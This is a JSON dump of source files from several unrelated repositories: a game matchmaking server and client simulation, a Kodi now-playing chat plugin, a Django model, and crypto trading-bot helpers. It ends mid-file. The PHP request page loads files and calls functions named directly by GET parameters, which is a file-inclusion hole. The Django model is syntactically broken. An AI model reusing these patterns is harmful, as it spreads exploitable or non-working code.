[ { "alpha_fraction": 0.6126833558082581, "alphanum_fraction": 0.6239442825317383, "avg_line_length": 29.817352294921875, "blob_id": "0f62a8fc625526adfb1bf418f21c5bcd203228a9", "content_id": "abee336d0163a7915999b2765cd6d256b3fa32dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6749, "license_type": "no_license", "max_line_length": 123, "num_lines": 219, "path": "/serverA3.py", "repo_name": "kossam001/GAME3110-Assignment3", "src_encoding": "UTF-8", "text": "import requests\nimport random\nimport socket\nimport time\nfrom _thread import *\nimport threading\nfrom datetime import datetime\nimport json\n\nclients_lock = threading.Lock()\nconnected = 0\n\nclients = {}\n\nclass Matches:\n numMatches = 0\n matches = {}\n\nplayerTiers = {\n 500: {'waitTime' : 0, 'players' : []}, \n 1000: {'waitTime' : 0, 'players' : []}, \n 1500: {'waitTime' : 0, 'players' : []}\n } \n\ndef connectionLoop(sock):\n while True:\n\n # A player just connected to the server, find a game for them\n data, addr = sock.recvfrom(1024)\n data = json.loads(data)\n\n # Get user info from lambda function\n user_profile = requestAPI(data['user_id'])\n \n print(user_profile) \n print(addr)\n \n user_profile['address'] = addr \n user_profile['timeConnected'] = str(datetime.now())\n assignLobbyRoom(user_profile)\n\n #TODO: check that the player is still waiting in the lobby\n\ndef cleanClients(sock):\n while True:\n dropped_players = []\n for c in list(clients.keys()):\n if (datetime.now() - clients[c]['lastBeat']).total_seconds() > 10:\n\n # Track dropped player\n player = {}\n player['id'] = str(c)\n dropped_players.append(player)\n\n print('Dropped Client: ', c)\n clients_lock.acquire()\n del clients[c]\n clients_lock.release()\n\n # Message all connected clients about dropped clients\n if (len(dropped_players) > 0):\n message = {\"cmd\": 2, \"players\": dropped_players}\n m = json.dumps(message);\n for c in clients:\n sock.sendto(bytes(m, 'utf8'), (c[0], c[1]))\n \n time.sleep(5)\n\ndef assignLobbyRoom(user_profile):\n rankingScore = user_profile['score']\n\n # Sort connecting clients into rooms based on their rank score\n for tier in playerTiers.keys():\n if int(rankingScore) <= tier or tier == 1500:\n\n playerTiers[tier]['players'].append(user_profile) # Add user to tier list\n \n # Player was assigned to an empty lobby, so start tracking wait time here\n if len(playerTiers[tier]['players']) == 1:\n playerTiers[tier]['waitTime'] = datetime.now()\n \n break\n\ndef assignMatchRoom(sock):\n for tier in playerTiers.keys():\n \n # There are more than 3 players waiting in the current tier, so immediately create a match\n if len(playerTiers[tier]['players']) >= 3:\n generateMatch(sock, tier, 3)\n\n # There are two players waiting in the current tier, wait for a third unless they have waited too long\n # If they waited too long, create a match for 2 players\n elif len(playerTiers[tier]['players']) == 2 and (datetime.now() - playerTiers[tier]['waitTime']).total_seconds() > 5:\n generateMatch(sock, tier, 2)\n\ndef generateMatch(sock, tier, numPlayersInMatch):\n matchId = Matches.numMatches\n matchInfo = {\"matchId\" : matchId, \"players\" : [], \"results\" : {}, \"startTime\" : str(datetime.now())}\n Matches.numMatches+=1\n\n # Assign first numPlayersInMatch players from the tier to the match\n for i in range(0, numPlayersInMatch):\n matchInfo[\"players\"].append(playerTiers[tier]['players'].pop(0))\n\n # Create a new socket for this match\n newSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n newSock.bind(('',0))\n matchInfo[\"matchSocket\"] = newSock.getsockname()\n\n Matches.matches[matchId] = matchInfo\n\n # Send match info to involved players\n for player in matchInfo[\"players\"]:\n m = json.dumps(matchInfo)\n sock.sendto(bytes(m,'utf8'), player['address'])\n print(\"Sent matchInfo to \" + str(player['address']))\n\n # Start new thread for the match\n start_new_thread(manageMatch, (newSock, matchId,))\n\ndef manageMatch(sock, matchId):\n matchMsgList = {'matchState': \"Begin\", 'players':{}}\n playersInMatch = Matches.matches[matchId][\"players\"]\n start_new_thread(matchConnectionLoop,(matchMsgList,sock,))\n print(\"matchsocket name \" + str(matchId) + \" \" + str(sock.getsockname()))\n\n response = None\n\n # Match loop\n while len(playersInMatch) > 0:\n\n # Process results of the match\n if len(matchMsgList['players']) > 0:\n if matchMsgList['matchState'] == \"End\":\n lambdaEndpoint = \"https://ohe5ppwqv2.execute-api.us-east-2.amazonaws.com/default/UpdatePlayerScore\"\n\n players = matchMsgList['players']\n\n # Results should be the same across players, so only need to call lambda once\n if response == None:\n response = requests.get(lambdaEndpoint, data=players[list(players.keys())[0]])\n responseBody = json.loads(response.content)\n responseBody = json.dumps(responseBody)\n\n # Send results to all player to let them know that the match is over\n for addr in matchMsgList['players']:\n sock.sendto(bytes(responseBody, 'utf8'), addr)\n\n # Match end - close socket as soon as all players notified\n playersInMatch = Matches.matches[matchId][\"players\"]\n playersInMatch.pop()\n\n print(matchMsgList)\n\n time.sleep(1)\n sock.close()\n\ndef matchConnectionLoop(msgList, sock):\n # Loop to process gameplay for the match\n\n while True:\n try:\n print(\"WAITING ON \" + str(sock.getsockname()))\n data, addr = sock.recvfrom(1024)\n msgList[\"matchState\"] = json.loads(data)[\"matchState\"]\n msgList['players'][addr] = data\n except:\n print(\"Match Over\")\n break;\n\ndef gameLoop(sock):\n while True:\n\n # Players have been assigned to lobbies, try to start a match\n\n # Assign clients to matches\n assignMatchRoom(sock)\n\n GameState = {\"cmd\": 1, \"players\": []}\n clients_lock.acquire()\n #print (clients)\n\n for c in clients:\n player = {}\n player['id'] = str(c)\n GameState['players'].append(player)\n \n s=json.dumps(GameState)\n #print(s)\n \n for c in clients:\n sock.sendto(bytes(s,'utf8'), (c[0],c[1]))\n \n clients_lock.release()\n time.sleep(1/30)\n\ndef requestAPI(userId):\n lambdaEndpoint = \"https://z67un5qyea.execute-api.us-east-2.amazonaws.com/default/MatchMaking\"\n requestBody = json.dumps({\"user_id\": str(userId)})\n\n response = requests.get(lambdaEndpoint, data=requestBody)\n responseBody = json.loads(response.content)\n\n return responseBody\n\ndef main():\n print(\"Server started\")\n\n port = 12345\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.bind(('', port))\n start_new_thread(gameLoop, (s,))\n start_new_thread(connectionLoop, (s,))\n start_new_thread(cleanClients,(s,))\n while True:\n time.sleep(1/30)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6580958962440491, "alphanum_fraction": 0.6761640310287476, "avg_line_length": 21.13846206665039, "blob_id": "f7bbddd86c4123157dc339c891bf39b9128736a1", "content_id": "90b206f41b9ca97794917b732d302db58407a349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2878, "license_type": "no_license", "max_line_length": 85, "num_lines": 130, "path": "/Simulation.py", "repo_name": "kossam001/GAME3110-Assignment3", "src_encoding": "UTF-8", "text": "import socket\nimport json\nimport requests\nfrom _thread import *\nimport threading\nimport time \nimport random\nimport sys\n\nmatch_lock = threading.Lock()\nmatches = {}\nmatchLogs = {}\n\nplayerIds = []\n\nclass Match:\n\tnumMatches = 0;\n\nserver_address = ('3.130.200.122', 12345)\n\ndef connectClientToServer(userId, sock):\n\tmessageBody = {}\n\tmessageBody['connect'] = None\n\tmessageBody['user_id'] = str(userId)\n\n\tm = json.dumps(messageBody)\n\tsock.sendto(bytes(m,'utf8'), server_address)\n\n\tprint(str(userId) + \" connected to server\")\n\n\tdata, serverAddr = sock.recvfrom(1024)\n\tdata = json.loads(data)\n\n\tmatchPort = data['matchSocket'][1]\n\tprint(matchPort)\n\n\t# Store match data\n\t# That way the clients have access to the same data\n\tmatch_lock.acquire()\n\tmatches[data['matchId']] = data\n\tmatch_lock.release()\n\n\tplayMatch(userId, data['matchId'], matchPort, sock,)\n\ndef playMatch(userId, matchId, matchPort, serverSock):\n\tprint(str(userId) + \" Start Match\")\n\tmatchSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tmatchSock.connect((server_address[0], matchPort))\n\tprint(\"match \" + str(matchId) + \" on socket \" + str((server_address[0], matchPort)))\n\n\tmatch_lock.acquire()\n\n\tif (len(matches[matchId]['results']) == 0):\n\t\tplayers = matches[matchId]['players']\n\n\t\t# Pick a random winner id\n\t\trandWinner = players[random.randint(0, len(players)-1)]['user_id']\n\n\t\tprint(randWinner + \" wins\")\n\n\t\tmatches[matchId]['results'][randWinner] = 'win'\n\n\t\t# Everyone that isn't a winner is a loser\n\t\tfor player in players:\n\t\t\tif (player['user_id'] != randWinner):\n\t\t\t\tmatches[matchId]['results'][player['user_id']] = 'lose'\n\n\t\tmatches[matchId]['matchState'] = \"End\"\n\n\t#print(str(userId) + \" End Match\")\n\tmatch_lock.release()\n\n\tm = json.dumps(matches[matchId])\n\tmatchSock.sendto(bytes(m,'utf8'), (server_address[0], matchPort))\n\n\t#time.sleep(5)\n\tprint(\"Match finish\")\n\n\t# Add result to log\n\tdata = matchSock.recvfrom(1024)\n\n\tprint(str(userId) + \" End Match\")\n\n\t# Since every player will have the same copy of results, use this to keep one copy\n\tif matchId not in matchLogs.keys():\n\t\tMatch.numMatches+=1;\n\t\tmatchLogs[matchId] = data\n\n\tplayerIds.append(userId)\n\n\twhile True:\n\t\ttime.sleep(1/30)\n\ndef main(numSimulations):\n\tfor i in range(0, 10):\n\t\tplayerIds.append(i)\n\n\twhile Match.numMatches < numSimulations:\n\t\tif (len(playerIds) > 0):\n\t\t\ti = playerIds.pop()\n\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\tsock.connect(server_address)\n\n\t\t\tstart_new_thread(connectClientToServer, (i, sock, ))\n\n\tf = open(\"matchResult.txt\", \"w\")\n\tfor match in matchLogs.items():\n\t\tf.write(\"\\n\")\n\t\tf.write(\"Match ID: \" + str(match[0]))\n\t\tf.write(\"\\n\")\n\n\t\tfor player in (json.loads((match[1])[0]))['players']:\n\t\t\tf.write(str(player))\n\t\t\tf.write(\"\\n\")\n\n\t\tf.write(\"\\n\")\n\n\t\tprint(\"\\n\")\n\t\tprint(match)\n\n\tf.close()\n\n\ttime.sleep(1/30)\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain(int(sys.argv[1]))\n\texcept:\n\t\tmain(10)\n" } ]
2
gpierron/KodiNowPlaying
https://github.com/gpierron/KodiNowPlaying
ea4cfd65940f715ef7592ebcf27dacd903cbe107
4adc6635e93a791221ba703edad1dce43bcf14e2
9cc81116d4ef20d9e7ad35c545191835f89d89db
refs/heads/master
2020-05-29T13:58:02.720394
2015-02-12T21:11:00
2015-02-12T21:11:00
24,105,106
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5340264439582825, "alphanum_fraction": 0.5555292963981628, "avg_line_length": 29.014184951782227, "blob_id": "a6e1ed15cc172593df8262001197a5352ee88378", "content_id": "cd8b2e9949053260f84168ec829661ae39a075b0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4232, "license_type": "permissive", "max_line_length": 106, "num_lines": 141, "path": "/kodi_current.py", "repo_name": "gpierron/KodiNowPlaying", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# author (alterer is a more suitable word) : Guillaume Pierron - \"Guiwiz\"\n#\n# This script is largely based on the work of Arnaud Bertrand - \"Arn-O\"\n# You can find his original work (a wonderful python script to control XBMC) here :\n# https://github.com/Arn-O/py-xbmc-remote-controller\n#\n# This script is also based on the work (a python script for xchat/hexchat to control\n# the linux player amarok locally) of zir0faive, not publically available yet :) \n\n__module_name__ = \"Kodi NowPlaying\"\n__module_version__ = \"0.89c\"\n__module_description__ = \"A dirty/quickly adapted script to print currently playing music on distant Kodi\"\n\nprint \"\\003\",__module_name__, __module_version__,\"has been loaded\\003\"\n\nimport xchat\nimport socket\nimport json\nfrom string import Template\n\nBUFFER_SIZE = 1024\n\n''' USERS SHOULD MODIFY THIS SECTION '''\nXBMC_IP = \"192.168.1.210\"\nXBMC_PORT = 9090\n\n\n''' USERS MAY MODIFY THIS TOO '''\nCOMPATIBLE_ENCODING = 'iso-8859-1'\nSCRIPTCMD = 'zik'\n\n'''STRING FORMATTING PREFS PART'''\nTITLE = 'Kodi\u000f '\nDISPLAY_PATTERN = TITLE + '\u000315#\u000f \u0002$artist \u000315-\u000f $title ' + \\\n\t\t '\u000315(#\u000f$track \u000315-\u000f $album \u000315-\u000f $year\u000315)\u000f ' + \\\n\t\t '\u000315[\u000f$p_min\u000315:\u000f$p_0sec\u000315/\u000f$t_min\u000315:\u000f$t_0sec ' + \\\n\t\t '\u000315,15$elapsed\u000314,14$remaining\u000f\u000315]\u000f' \n\nBAR_LENGTH = 10\nCHAR_ELAPSED = '#'\nCHAR_REMAINING = '='\n\ndef now_playing(item, properties):\n if item:\n #constructing initial data\n full_data = {}\n full_data.update(item)\n full_data.update(properties)\n \n # retrieving first artist field only\n if item['artist']:\n full_data['artist'] = item['artist'][0]\n\n # computing progress bar and time values\n n = int(BAR_LENGTH * properties['percentage'] / 100)\n full_data['elapsed'] = CHAR_ELAPSED * n\n full_data['remaining'] = CHAR_REMAINING * (BAR_LENGTH - n)\n full_data['p_min'] = properties['time']['hours'] * 60 + \\\n properties['time']['minutes'] \n full_data['p_0sec'] = \"%02d\" % properties['time']['seconds']\n full_data['t_min'] = properties['totaltime']['hours'] * 60 + \\\n properties['totaltime']['minutes'] \n full_data['t_0sec'] = \"%02d\" % properties['totaltime']['seconds']\n \n\n str_ret = Template(DISPLAY_PATTERN).substitute(full_data)\n \n else:\n str_ret= \"[is not playing anything]\"\n return str_ret\n\ndef get_item(ip, port):\n command = {\"jsonrpc\": \"2.0\",\n \"method\": \"Player.GetItem\",\n \"params\": {\n \"playerid\": 0,\n \"properties\": [\n \"album\",\n \"title\",\n \"track\",\n \"artist\",\n \"year\",\n \"genre\" ] },\n \"id\": 1}\n ret = call_api(ip, port, command)\n item = None\n try:\n item = ret['result']['item']\n except KeyError:\n pass\n return item\n\ndef get_properties(ip, port):\n command = {\"jsonrpc\": \"2.0\",\n \"method\": \"Player.GetProperties\",\n \"params\": {\n \"playerid\": 0,\n \"properties\": [\n \"time\",\n \"totaltime\",\n \"percentage\",\n \"position\"] },\n \"id\": 1}\n ret = call_api(ip, port, command)\n result = None\n try:\n result = ret['result']\n except KeyError:\n pass\n return result\n\ndef call_api(ip, port, command):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, port))\n s.send(json.dumps(command))\n data = ''\n while True:\n filler = s.recv(BUFFER_SIZE)\n data += filler\n nb_open_brackets = data.count('{') - data.count('}')\n if nb_open_brackets == 0:\n break\n s.close()\n ret = json.loads(data)\n return ret\n\n\ndef play_what():\n item = get_item(XBMC_IP, XBMC_PORT)\n properties = get_properties(XBMC_IP, XBMC_PORT)\n return now_playing(item, properties)\n\ndef xchat_kodi_cmd(argv, arg_to_eol, c):\n if len(argv) == 1:\n current=play_what()\n xchat.command('me %s' % current.encode(COMPATIBLE_ENCODING))\n return xchat.EAT_ALL\n\nxchat.hook_command(SCRIPTCMD, xchat_kodi_cmd, help=\"/\"+SCRIPTCMD)\n" }, { "alpha_fraction": 0.7009345889091492, "alphanum_fraction": 0.7009345889091492, "avg_line_length": 25.75, "blob_id": "8c63aa5a3cd58cf0b033a186480f64e33c34b2cd", "content_id": "55ebf2e160d2184b4910846cb4f5dfa90d47df49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 107, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/README.md", "repo_name": "gpierron/KodiNowPlaying", "src_encoding": "UTF-8", "text": "KodiNowPlaying\n==============\n\nxchat / hexchat python plugin to display XBMC / Kodi currently playing song\n" } ]
2
mensrex/Swaedes_project
https://github.com/mensrex/Swaedes_project
214b53eb6ebf879c8754423b90cdf130af6d3100
0da420a66cdf474ab13600845a65d008fe5b20a1
0750550e97c51845537d8222304524a6320374c0
refs/heads/master
2021-01-18T00:59:23.481500
2016-04-01T11:05:37
2016-04-01T11:05:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 18, "blob_id": "f18b1bfc4cc8e48c8c9f5900b4fce4e55da95554", "content_id": "9d7e390b263cdccf6cd9e364db48a79aa7b419e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 39, "license_type": "no_license", "max_line_length": 19, "num_lines": 2, "path": "/README.md", "repo_name": "mensrex/Swaedes_project", "src_encoding": "UTF-8", "text": "# Swaedes_project\nAndroid app project \n" }, { "alpha_fraction": 0.662420392036438, "alphanum_fraction": 0.662420392036438, "avg_line_length": 28.66666603088379, "blob_id": "8b8465e1da030e06eff7e60760134604b9dff1a6", "content_id": "4a5122484ccd50d2c9c534fc991fbf716bdafe91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/Django/SWAEDES/models.py", "repo_name": "mensrex/Swaedes_project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass PictureAndData(models.Model):\n localisation=models.TextField()\n GPS=models.TextField()\n photo=models.ImageField(upload_to=\"photos/\")\n photoPath=models.TextField()\n commentary=TextField()\n id=models.Integer.Field()\n idUser=TextField()\n\n def __str__(self,_localisation,_GPS,_photo,_commentary,_id,_idUser):\n self.localisation=_localisation\n self.GPS=_GPS\n self.photo=_photo\n self.commentary=_commentary\n self.id=_id\n self.idUser=_idUser\n self.photoPath=self.photo.path\n return self\n \n" } ]
2
rcshadman/TradeBot-1
https://github.com/rcshadman/TradeBot-1
7c2c1139360d434797ddc35a9e705297d6d27c56
957c323b9aa52a0058acad121b36e41eb1436248
95654aebbbb0991751c13ec59ce065d45ea58633
refs/heads/master
2021-09-03T14:18:00.422140
2018-01-09T18:50:08
2018-01-09T18:50:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5478348731994629, "alphanum_fraction": 0.5520644783973694, "avg_line_length": 30.826923370361328, "blob_id": "e7c52cec3daa0fa3636df375f6b4d8527b9bc51e", "content_id": "11c6a290968ab47e2dad50165c290f6aac635dc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4965, "license_type": "no_license", "max_line_length": 84, "num_lines": 156, "path": "/python/tree_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "def treeToList(rootNode):\n ''' rootNode is the root of the tree\n returns a list containing all branches,\n where each branch is a list containing TradingPairs'''\n branchList = []\n\n \"\"\" Iterative approach\n branchOfBreadth = [[]]\n breadth = [rootNode]\n i = 0\n while(len(breadth)):\n i += 1\n #print(i)\n # take out first item of each list\n crBranch = branchOfBreadth[0]\n\n #print(len(crBranch))\n if (len(crBranch) > 8):\n for i in crBranch: print(i, end='')\n exit()\n\n branchOfBreadth.remove(crBranch)\n crNode = breadth[0]\n breadth.remove(crNode)\n\n # update the visited and breadth list\n crBranch.append(crNode)\n\n kids = crNode.getChildren()\n if len(kids) == 0:\n branchList.append(crBranch)\n\n for c in kids:\n breadth.append(c)\n branchOfBreadth.append(list(crBranch))\n\n \"\"\"\n def populateBranchList(node, branch = []):\n kids = node.getChildren()\n\n branch.append(node)\n if len(kids) == 0: # reached leaf\n branchList.append(branch)\n else:\n for k in kids:\n populateBranchList(k, list(branch))\n\n populateBranchList(rootNode) # \"\"\"\n return branchList\n\n\ndef getTreeStats(rootNode):\n ''' return info on the amount of leaves, amount of branches of diff lengths,\n and the str repr of the tree itself '''\n treeStr = rootNode.nodeStr()\n\n lines = treeStr.split(\"\\n\")\n\n leaves = {}\n totalLeaves = 0\n for line in lines:\n linelist = line.split()\n #print(linelist)\n if linelist[-1] == \"0\": # found a leaf\n totalLeaves += 1\n\n dictKey = linelist[0]+\"steps\"\n if dictKey in leaves:\n leaves[dictKey] += 1\n\n else:\n leaves[dictKey] = 1\n\n leaves[\"total\"] = totalLeaves\n leaves[\"start\"] = str(rootNode)\n return treeStr, leaves\n\ndef populateTree(tradingPairs, rootNode):\n ''' populateTree([TradingPairs], TradingPair) -> rootNode'''\n firstCoin = rootNode.getHead()\n\n \"\"\"\n visitedOfBreadth = [set()]\n breadth = [rootNode]\n i = 0\n while(len(breadth)):\n i+=1\n #print(i)\n # take out first item of each list\n crVisited = visitedOfBreadth[0]\n visitedOfBreadth.remove(crVisited)\n crNode = breadth[0]\n breadth.remove(crNode)\n\n if crNode.getTail() == firstCoin:\n continue; # no need for nextNodes if we successfully formed a loop\n\n crVisited.add(crNode.getTail())\n #print(crVisited)\n nextNodes = list(filter( lambda x: crNode.comesBefore(x) and\n x.getTail() not in crVisited\n , tradingPairs ))\n #print(len(nextNodes))\n # update the visited and breadth list\n for nextNode in nextNodes:\n child = nextNode.duplicate()\n crNode.addChild(child)\n breadth.append(nextNode)\n visitedOfBreadth.append(set(crVisited))\n\n if len(nextNodes) == 0:\n ''' remove the branch leading up to leaf; Delete all the way up\n from leaf to root, stop only if the parent has > 1 children '''\n #print(\"{} -X-> {}\".format(crNode, firstCoin))\n parent = crNode.getParent()\n while parent is not None:\n kids = parent.getChildren()\n parent.rmChild(crNode)\n #print(\"lala\\t\"+str(len(kids)))\n if len(kids) > 0:\n break\n\n # crParent cannot lead to other children, so keep deleting\n parent = parent.getParent()\n\n \"\"\"\n #for p in tradingPairs: print(p)\n def recurse(crNode, visitedNodes = set()):\n '''determines whether the crNode will lead to forming a valid path'''\n if crNode.getTail() == firstCoin: # crNode leads back to firstCoin\n #print(str(crNode)+\" reached end\")\n return True\n\n visitedNodes.add(crNode.getTail())\n nextNodes = list(filter( lambda x: crNode.comesBefore(x) and\n x.getTail() not in visitedNodes\n , tradingPairs ))\n\n #print(\"{}->{}kids\".format(crNode, len(nextNodes)) )\n #for p in nextNodes: print(p, end=\"\")\n #print()\n\n for nextNode in nextNodes:\n child = nextNode.duplicate()\n if recurse( child, set(visitedNodes) ): # make a copy of visitedNodes\n crNode.addChild(child) # only add pairs that leads to forming a path\n\n # crNode leads to forming a path => prevNode should adopt crNode as child\n return len(crNode.getChildren())\n\n recurse(rootNode)\n #recurse(rootNode, {rootNode.getTail()}, {rootNode.getSymbol()} )\n # \"\"\"\n\n\n return rootNode\n" }, { "alpha_fraction": 0.5615212321281433, "alphanum_fraction": 0.563758373260498, "avg_line_length": 23.83333396911621, "blob_id": "1781e1f3f09a3f2e1641970d872ca385f16f6c96", "content_id": "cb8da537efcd2cad579c70cb3aa63b897af8eb74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/python/helper_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nfrom sys import stderr\nimport json\n\ndef eprint(*args, **kwargs):\n print(*args, file=stderr, **kwargs)\n\ndef reFormatJSON(pyRes, keys = []):\n tmp = pyRes;\n\n if len(keys):\n tmp = {}\n for key in pyRes:\n print(\"{} in {} is {}\".format(key, keys, key in keys))\n if key in keys:\n tmp[key] = pyRes[key];\n\n return json.dumps(tmp, sort_keys=True, indent=4)\n" }, { "alpha_fraction": 0.5373352766036987, "alphanum_fraction": 0.5387994050979614, "avg_line_length": 22.55172348022461, "blob_id": "e1dab0615b969ecdd8ff07825728c152e5120b06", "content_id": "a54f37d3e48ce00f96e7999bdc2cd6e8699ccefd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 683, "license_type": "no_license", "max_line_length": 89, "num_lines": 29, "path": "/web/php/send_req.php", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html>\n <head>\n <meta charset=\"utf-8\">\n <title>sends and receives GET/POST request</title>\n </head>\n\n <?php\n require_once(\"gen_func.php\");\n\n if ($_GET['reqType'] == 'public'){\n require_once($_GET['platform'].\"/public_req.php\");\n } else if ($_GET['reqType'] == 'private'){\n require_once('trader.php');\n require_once($_GET['platform'].'/zqis.php'); //setup vars $api_key and $api_secret\n require_once($_GET['platform'].'/bot.php');\n require_once($_GET['platform'].'/private_req.php');\n }\n ?>\n\n <body>\n <a class = \"json_response\">\n <?php\n echo call_func($_GET['cmd']);\n ?>\n </a>\n\n </body>\n</html>\n" }, { "alpha_fraction": 0.48977556824684143, "alphanum_fraction": 0.4947631061077118, "avg_line_length": 29.378787994384766, "blob_id": "9a4963d5ce6cb4129c5edb94256f78fb009bc778", "content_id": "10c9444bd817204e5ae2c6f488d4f223daba8d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2005, "license_type": "no_license", "max_line_length": 89, "num_lines": 66, "path": "/python/tp_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from TradingPair import TradingPair\n\ndef getAllTPs(platform, validSymbols):\n tradingPairs = []\n for symbol in validSymbols:\n pl = symbol2pl(platform, symbol)\n tradingPairs.append( TradingPair(pl) )\n pl.reverse()\n tradingPairs.append( TradingPair(pl, isInverted = True) )\n\n return tradingPairs\n\ndef ps2TP(plat, ps, validpsSet):\n ''' pl2TP(poloniex, [\"btc-ltc\"], [\"btc-ltc\"]) -> TP([btc,ltc], not inverted)\n pl2TP(poloniex, [\"ltc-btc\"], [\"btc-ltc\") -> TP([btc,ltc], inverted)\n\n validpsSet is a set where each item is a ps'''\n\n return TradingPair(ps.split(\"-\"), platform = plat, isInverted = ps not in validpsSet)\n\ndef symbol2pl(plat, symbol):\n ''' func(bitfinex, btc-ltc) -> [btc,ltc] '''\n symbol = symbol.lower()\n delimiter = list(filter(lambda x: x in symbol,[\"-\",\"_\",\" \"]))\n if delimiter:\n tmp = symbol.split(delimiter[0])\n\n elif (len(symbol) == 6):\n tmp = [symbol[:3], symbol[3:]]\n\n else:\n # use dictionary to translate\n '''\n coinDict()\n for c in dict:\n if symbol startswith c:\n tmp = [symbol[:len(c)], symbol[len(c):]]\n elif symbol endswith c:\n tmp = [symbol[len(c):], symbol[:len(c)]]\n else: # not anything we know in coinDict\n mid = len(symbol)//2\n tmp = [symbol[:mid], symbol[mid:]]\n eprint(\"dict knows nothing about: \"+symbol)\n #exit()\n '''\n\n if (plat == \"bitfinex\"):\n pass\n\n elif (plat == \"poloniex\"):\n tmp.reverse()\n\n elif (plat == \"binance\"):\n pass\n\n elif (plat == \"yobit\"):\n pass\n\n else:\n print('''\n ################# ERROR ####################################################\n ## trying to process: |{}| for unrecognized platform: {}\n ################# ERROR ####################################################\n '''.format(tmp, plat))\n exit()\n return tmp\n" }, { "alpha_fraction": 0.6420404314994812, "alphanum_fraction": 0.6481969952583313, "avg_line_length": 22.6875, "blob_id": "56d957465b2137651299d0698c8c577ed27094ad", "content_id": "e87e7288b21ecf6292dcb1d2fb9c35e582312428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 96, "num_lines": 48, "path": "/python/gen_resources.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from helper_func import eprint\nimport sys\nif len(sys.argv) != 2:\n eprint(\"Usage: python test.py platform (opt: redirect to resources/platform/all_paths.txt)\")\n exit()\n\nfrom Trader import Trader\nfrom tree_func import *\nfrom tp_func import *\n\nplatform = sys.argv[1]\nbot = Trader(platform)\n\nonlinelist = bot.getValidPairs() # \"\"\"\ntotalPairs = len(onlinelist)\nprint(\"totalPairs: \"+str(totalPairs))\n\nreducedList = onlinelist[:totalPairs]\n\n#print(\"reducedList:\\n\"+str(reducedList))\n#print(\"onlinelist:\\n\"+str(onlinelist))\n#exit()\nnodelist = getAllTPs(platform, reducedList)\n#for p in nodelist: print(p)\n#print(len(nodelist))\n#exit()\n\ni=0\nfor r in nodelist:#[7:8]:\n i += 1\n rootPair = r\n eprint(\"{}\\t\\t {}/{}\".format(r, i, len(nodelist)))\n\n populateTree(nodelist, rootPair)\n #print(len(rootPair.getChildren()))\n #continue\n #exit()\n #'''\n allPaths = treeToList(rootPair)\n for path in allPaths:\n print(str(len(path)-1)+\"steps\", end='')\n for p in path:\n print(p, end='')\n print() # '''\n\n treeStr, pathStats = getTreeStats(rootPair)\n #print(treeStr)\n print(pathStats)\n" }, { "alpha_fraction": 0.5726223587989807, "alphanum_fraction": 0.5750099420547485, "avg_line_length": 28.564706802368164, "blob_id": "bd01a031b00bca3e9dd19775675b9a917ceddc5f", "content_id": "f54ade86ca1fda05ad63500746616c89930aa462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2513, "license_type": "no_license", "max_line_length": 104, "num_lines": 85, "path": "/python/TradingPair.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "import json\n\nclass TradingPair:\n ''' contains information about a pair of coins that will help with\n algorithms in process.py'''\n\n def __init__(self, pairLst, symbol = \"\", platform = \"\", isInverted = False):\n ''' pairLst must contain two items, names (not aliases) of 2 coins\n i.e. they must have gone thr the translation process so now\n what they're called should no longer be platform specific'''\n\n self.__platform = platform\n self.__children = []\n self.__parent = None\n self.__symbol = symbol\n self.__head = pairLst[0] # this denotes the \"coin\"\n self.__tail = pairLst[1] # this denotes the \"currency\"\n\n self.__isInverted = isInverted\n\n def duplicate(self):\n ''' returns a duplicate of self except no children or parent '''\n return TradingPair([self.__head,self.__tail], self.__symbol, self.__platform, self.__isInverted)\n\n def getPlatform(self):\n return self.__platform\n\n def isInverted(self):\n return self.__isInverted\n\n def getSymbol(self):\n return self.__symbol\n\n def getHead(self):\n return self.__head\n\n def getTail(self):\n return self.__tail\n\n def comesBefore(self, other):\n ''' other is of type TradingPair\n returns whether other connects to tail of self like dominoes '''\n return self.__tail == other.getHead()\n\n def rmChild(self, child):\n #print(\"{} appending {}\".format(self, child));\n if child in self.__children:\n self.__children.remove(child)\n\n else:\n pass\n #throw 